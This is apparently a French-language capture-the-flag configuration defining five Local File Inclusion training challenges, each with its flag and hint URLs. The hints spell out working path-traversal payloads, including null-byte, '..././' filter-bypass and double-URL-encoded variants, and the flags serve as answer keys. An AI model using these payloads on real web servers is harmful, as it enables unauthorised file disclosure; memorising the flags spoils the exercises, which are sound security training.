[Intro]
theme: Training
category: TrainingLFI
label: Web: LFI
docker: ctf-lfi
description: 
    TrainingLFI
  




#
#  Simple LFI
#
[TrainingLFISimple]
name: LFI  
value: 1
category:  TrainingLFI
flag: Flag_comment_tu_m_as_trouve
hint: http://{IP_SERVER}/yoloctf/hackersguide/?cat=lfi
hint2: http://{IP_SERVER}/yoloctf/hackersguide/?id=LFI
hint3: http://{IP_SERVER}/IPSERVER/training-lfi-simple.php?page=/tmp/lfi/flag_simple.txt
description:
    ```
    Dans le navigateur: http://{IP_SERVER}/IPSERVER/training-lfi-simple.php
    Avec proxy        : http://{IP_SERVER}/URLPROXY/IPSERVER/training-lfi-simple.php
    ```
    Identifiez la LFI.
    Utilisez là pour lire le contenu du fichier /tmp/lfi/flag_simple.txt




#
#  LFI back to root
#
[TrainingLFIRoot]
name: LFI à partir du Repertoire courant 
value: 1
category:  TrainingLFI
flag: Flag_back_to_root
hint: http://{IP_SERVER}/yoloctf/hackersguide/?cat=lfi
hint2: http://{IP_SERVER}/yoloctf/hackersguide/?id=LFIRoot
hint3: http://{IP_SERVER}/IPSERVER/training-lfi-root.php?page=../../../tmp/lfi/flag_root.txt
description:
    ```
    Dans le navigateur: http://{IP_SERVER}/IPSERVER/training-lfi-root.php
    Avec proxy        : http://{IP_SERVER}/URLPROXY/IPSERVER/training-lfi-root.php
    ```
    Identifiez la LFI.
    Utilisez là pour lire le contenu du fichier /tmp/lfi/flag_root.txt




#
#  LFI NUll
#
[TrainingLFINull]
name: LFI avec Ajout d'extension 
value: 1
category:  TrainingLFI
flag: Flag_vieille_vuln_que_j_aimais
hint: http://{IP_SERVER}/yoloctf/hackersguide/?cat=lfi
hint2: http://{IP_SERVER}/yoloctf/hackersguide/?id=LFINull
hint3: http://{IP_SERVER}/IPSERVER/training-lfi-null.php?page=../../../tmp/lfi/flag_null.txt%00
description:
    ```
    Dans le navigateur: http://{IP_SERVER}/IPSERVER/training-lfi-null.php
    Avec proxy        : http://{IP_SERVER}/URLPROXY/IPSERVER/training-lfi-null.php
    ```
    Identifiez la LFI.
    Utilisez là pour lire le contenu du fichier /tmp/lfi/flag_null.txt




#
#  LFI WafSimple : Filtre ../
#
[TrainingLFIWafSimple]
name: LFI avec Waf simple  
value: 10
category:  TrainingLFI
flag: Flag_desole_ma_femme_veut_pas
hint:http://{IP_SERVER}/yoloctf/hackersguide/?cat=lfi
hint2:http://{IP_SERVER}/yoloctf/hackersguide/?id=LFIWaf
hint3:http://{IP_SERVER}/IPSERVER/training-lfi-wafsimple.php?page=..././..././..././..././/tmp/lfi/flag_wafsimple.txt
description:
    ```
    Dans le navigateur: http://{IP_SERVER}/IPSERVER/training-lfi-wafsimple.php
    Avec proxy        : http://{IP_SERVER}/URLPROXY/IPSERVER/training-lfi-wafsimple.php
    ```
    Identifiez la LFI.
    Le développeur a ajouté un Waf qui retire la chaine '../'.</br>
    Utilisez cette LFI, avec des ..././, pour lire le contenu du fichier /tmp/lfi/flag_wafsimple.txt



#
#  LFI WafDouble : Filtre ../ et urldecode
#
[TrainingLFIWafDouble]
name: LFI avec Waf simple et double encodage 
value: 10
category:  TrainingLFI
flag: Flag_desole_ma_femme_veut_toujours_pas
hint: http://{IP_SERVER}/yoloctf/hackersguide/?cat=lfi
hint2: http://{IP_SERVER}/yoloctf/hackersguide/?id=LFIURLDoubleEncodage
hint3: http://{IP_SERVER}/IPSERVER/training-lfi-wafdouble.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252f/tmp/lfi/flag_wafdouble.txt
description:
    ```
    Dans le navigateur: http://{IP_SERVER}/IPSERVER/training-lfi-wafdouble.php
    Avec proxy        : http://{IP_SERVER}/URLPROXY/IPSERVER/training-lfi-wafdouble.php
    ```
    Identifiez la LFI.
    Le développeur a ajouté un Waf qui retire la chaine '../' et décode l'url pour éviter les petits malins qui utilisent le % encodage.
    Utilisez cette LFI, avec un double encodage, pour lire le contenu du fichier /tmp/lfi/flag_wafdouble.txt

